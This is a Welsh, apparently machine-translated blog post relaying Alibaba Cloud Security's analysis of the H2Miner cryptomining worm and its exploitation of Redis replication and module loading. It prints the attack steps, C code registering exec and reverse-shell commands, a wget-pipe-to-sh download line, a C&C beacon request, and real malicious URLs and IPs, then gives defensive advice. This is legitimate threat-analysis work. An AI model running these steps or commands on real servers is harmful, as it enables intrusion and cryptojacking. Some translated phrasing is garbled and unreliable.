Ddiwrnod yn ôl, ymosododd mwydyn tebyg ar un o weinyddion fy mhrosiect. I chwilio am ateb i’r cwestiwn “beth oedd hwnna?” Des i o hyd i erthygl wych gan dîm Diogelwch Cwmwl Alibaba. Gan na wnes i ddod o hyd i'r erthygl hon ar Habré, penderfynais ei chyfieithu'n arbennig i chi <3
Mynediad
Yn ddiweddar, darganfu tîm diogelwch Alibaba Cloud achos sydyn o H2Miner. Mae'r math hwn o fwydyn maleisus yn defnyddio'r diffyg awdurdodiad neu gyfrineiriau gwan ar gyfer Redis fel pyrth i'ch systemau, ac ar ôl hynny mae'n cydamseru ei fodiwl maleisus ei hun gyda'r caethwas trwy gydamseru meistr-gaethwas ac yn olaf yn lawrlwytho'r modiwl maleisus hwn i'r peiriant yr ymosodwyd arno ac yn gweithredu'n faleisus cyfarwyddiadau.
Yn y gorffennol, cynhaliwyd ymosodiadau ar eich systemau yn bennaf gan ddefnyddio dull sy'n cynnwys tasgau wedi'u hamserlennu neu allweddi SSH a ysgrifennwyd i'ch peiriant ar ôl i'r ymosodwr fewngofnodi i Redis. Yn ffodus, ni ellir defnyddio'r dull hwn yn aml oherwydd problemau gyda rheoli caniatâd neu oherwydd fersiynau system gwahanol. Fodd bynnag, gall y dull hwn o lwytho modiwl maleisus weithredu gorchmynion yr ymosodwr yn uniongyrchol neu gael mynediad i'r gragen, sy'n beryglus i'ch system.
Oherwydd y nifer fawr o weinyddion Redis a gynhelir ar y Rhyngrwyd (bron i 1 miliwn), mae tîm diogelwch Alibaba Cloud, fel nodyn atgoffa cyfeillgar, yn argymell nad yw defnyddwyr yn rhannu Redis ar-lein ac yn gwirio cryfder eu cyfrineiriau yn rheolaidd ac a ydynt yn cael eu peryglu. dewis cyflym.
H2Milwr
Mae H2Miner yn botrwyd mwyngloddio ar gyfer systemau sy'n seiliedig ar Linux a all oresgyn eich system mewn amrywiaeth o ffyrdd, gan gynnwys diffyg awdurdodiad mewn gwendidau Hadoop edafedd, Docker, a Redis gweithredu gorchymyn o bell (RCE). Mae botnet yn gweithio trwy lawrlwytho sgriptiau maleisus a malware i gloddio'ch data, ehangu'r ymosodiad yn llorweddol, a chynnal cyfathrebiadau gorchymyn a rheoli (C&C).
Redis RCE
Rhannwyd gwybodaeth ar y pwnc hwn gan Pavel Toporkov yn ZeroNights 2018. Ar ôl fersiwn 4.0, mae Redis yn cefnogi nodwedd llwytho plug-in sy'n rhoi'r gallu i ddefnyddwyr lwytho felly ffeiliau a luniwyd gyda C yn Redis i weithredu gorchmynion Redis penodol. Mae'r swyddogaeth hon, er ei bod yn ddefnyddiol, yn cynnwys bregusrwydd lle, yn y modd meistr-gaethwas, gellir cydamseru ffeiliau â'r caethwas trwy'r modd ail-gydamseru llawn. Gall hwn gael ei ddefnyddio gan ymosodwr i drosglwyddo ffeiliau maleisus felly. Ar ôl i'r trosglwyddiad gael ei gwblhau, mae'r ymosodwyr yn llwytho'r modiwl ar yr enghraifft Redis yr ymosodwyd arno ac yn gweithredu unrhyw orchymyn.
Dadansoddiad Mwydod Drwgwedd
Yn ddiweddar, darganfu tîm diogelwch Alibaba Cloud fod maint y grŵp glöwr maleisus H2Miner wedi cynyddu'n ddramatig yn sydyn. Yn ôl y dadansoddiad, mae'r broses gyffredinol o ymosodiad fel a ganlyn:
Mae H2Miner yn defnyddio RCE Redis ar gyfer ymosodiad llawn. Yn gyntaf mae ymosodwyr yn ymosod ar weinyddion Redis heb eu diogelu neu weinyddion gyda chyfrineiriau gwan.
Yna maen nhw'n defnyddio'r gorchymyn config set dbfilename red2.so i newid enw'r ffeil. Ar ôl hyn, mae'r ymosodwyr yn gweithredu'r gorchymyn slaveof i osod y cyfeiriad gwesteiwr atgynhyrchu meistr-gaethwas.
Pan fydd yr enghraifft Redis yr ymosodwyd arno yn sefydlu cysylltiad meistr-gaethwas gyda'r Redis maleisus sy'n eiddo i'r ymosodwr, mae'r ymosodwr yn anfon y modiwl heintiedig gan ddefnyddio'r gorchymyn fullresync i gydamseru'r ffeiliau. Yna bydd y ffeil red2.so yn cael ei lawrlwytho i'r peiriant yr ymosodwyd arno. Yna mae'r ymosodwyr yn defnyddio'r modiwl llwytho ./red2.so i lwytho hwn felly ffeil. Gall y modiwl weithredu gorchmynion gan ymosodwr neu gychwyn cysylltiad cefn (drws cefn) i gael mynediad i'r peiriant yr ymosodwyd arno.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Ar ôl gweithredu gorchymyn maleisus fel / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, bydd yr ymosodwr yn ailosod enw'r ffeil wrth gefn ac yn dadlwytho'r modiwl system i lanhau'r olion. Fodd bynnag, bydd y ffeil red2.so yn dal i aros ar y peiriant yr ymosodwyd arno. Cynghorir defnyddwyr i dalu sylw i bresenoldeb ffeil mor amheus yn ffolder eu hachos Redis.
Yn ogystal â lladd rhai prosesau maleisus i ddwyn adnoddau, dilynodd yr ymosodwr sgript faleisus trwy lawrlwytho a gweithredu ffeiliau deuaidd maleisus i . Mae hyn yn golygu y gall enw'r broses neu'r enw cyfeiriadur sy'n cynnwys kinsing ar y gwesteiwr ddangos bod y peiriant hwnnw wedi'i heintio gan y firws hwn.
Yn ôl canlyniadau peirianneg gwrthdro, mae'r malware yn cyflawni'r swyddogaethau canlynol yn bennaf:
- Lanlwytho ffeiliau a'u gweithredu
- Mwyngloddio
- Cynnal cyfathrebu C&C a gweithredu gorchmynion ymosodwr
Defnyddiwch masscan ar gyfer sganio allanol i ehangu eich dylanwad. Yn ogystal, mae cyfeiriad IP y gweinydd C&C wedi'i godio'n galed yn y rhaglen, a bydd y gwesteiwr yr ymosodir arno yn cyfathrebu â'r gweinydd cyfathrebu C&C gan ddefnyddio ceisiadau HTTP, lle nodir y wybodaeth zombie (gweinydd dan fygythiad) ym mhennawd HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Dulliau ymosod eraill
Cyfeiriadau a chysylltiadau a ddefnyddir gan y mwydyn....
/cinio
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Yn gyntaf, ni ddylai Redis fod yn hygyrch o'r Rhyngrwyd a dylid ei amddiffyn â chyfrinair cryf. Mae hefyd yn bwysig bod cleientiaid yn gwirio nad oes ffeil red2.so yn y cyfeiriadur Redis ac nad oes “kinsing” yn enw'r ffeil/proses ar y gwesteiwr.
Ffynhonnell: hab.com